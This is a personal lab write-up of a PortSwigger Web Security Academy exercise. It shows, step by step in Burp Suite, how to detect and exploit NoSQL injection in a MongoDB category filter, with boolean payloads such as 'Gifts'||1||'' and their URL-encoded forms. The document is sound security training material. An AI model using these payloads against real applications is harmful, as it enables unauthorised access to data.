[This lab demonstrates](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection) a classic **NoSQL injection vulnerability** in a MongoDB-backed application. The category filter endpoint takes user input and embeds it in a backend query **without sanitization**, allowing an attacker to inject JavaScript-based logic to **bypass filters** and **view unauthorized data** — in this case, unreleased products.
---
## Vulnerability Overview: NoSQL Injection in MongoDB
MongoDB queries are often constructed using **JavaScript-like syntax**, such as:
```js
db.products.find({ category: userInput })
```
If `userInput` is not properly sanitized, an attacker can inject **logical operators**, such as `|| 1 ||`, to alter query behavior.
This vulnerability arises from:
- Unsafe string concatenation or dynamic query construction
- Direct embedding of user-controlled values into queries
- Lack of input validation or encoding
##### Step 1: Trigger the Category Filter and Inspect the Request
In Burp’s browser:
- Clicked on a **product category** (e.g., “Gifts”)
- In **Proxy > HTTP history**, captured:
```http
GET /?category=Gifts
```
Sent this to Repeater for testing.
---
##### Step 2: Test for JavaScript Injection Behavior
Modified the parameter:
```http
GET /?category=Gifts'
```
→ Response contained a **JavaScript syntax error**
✅ Indicates that the input is **injected into a JS-based query**, consistent with MongoDB behavior
![[CleanShot 2025-04-14 at 20.10.32.png]]
---
##### Step 3: Test Valid JS Injection Payload
Tried:
```http
GET /?category=Gifts'+'
```
URL-encoded as:
```
Gifts%27+%27
```
→ No syntax error → confirms payload was accepted as part of a larger string
---
##### Step 4: Inject a Boolean False Condition
Injected:
```
Gifts' && 0 && 'x
```
Encoded as:
```
Gifts%27%20%26%26%200%20%26%26%20%27x
```
→ Response: **no products returned**
✅ Confirms logical condition injection is working
---
##### Step 5: Inject a Boolean True Condition
Injected:
```
Gifts' && 1 && 'x
```
Encoded as:
```
Gifts%27%20%26%26%201%20%26%26%20%27x
```
→ Response: products from the **Gifts** category returned
✅ Confirms boolean logic is being evaluated server-side
---
##### Step 6: Inject a Universal Truth to Bypass Filtering
Final payload:
```http
Gifts'||1||'
```
Encoded as:
```
Gifts%27%7C%7C1%7C%7C%27
```
→ Response: includes **Gifts** products **and** unreleased products
✅ Vulnerability successfully exploited
Right-clicked response → **Show in browser**
→ Verified: **unreleased products are now visible**
---
### Quick Burp Tip: Fully URL-Encode Payloads
To safely encode special characters (like `'`, `|`, or spaces) for injections:
1. **Highlight** your payload in the request.
2. **Right-click** → **Convert selection → URL → URL-encode all characters**
✅ This ensures _everything_ is percent-encoded — perfect for NoSQLi, XSS, and other injection payloads.
![[CleanShot 2025-04-14 at 20.29.53.png]]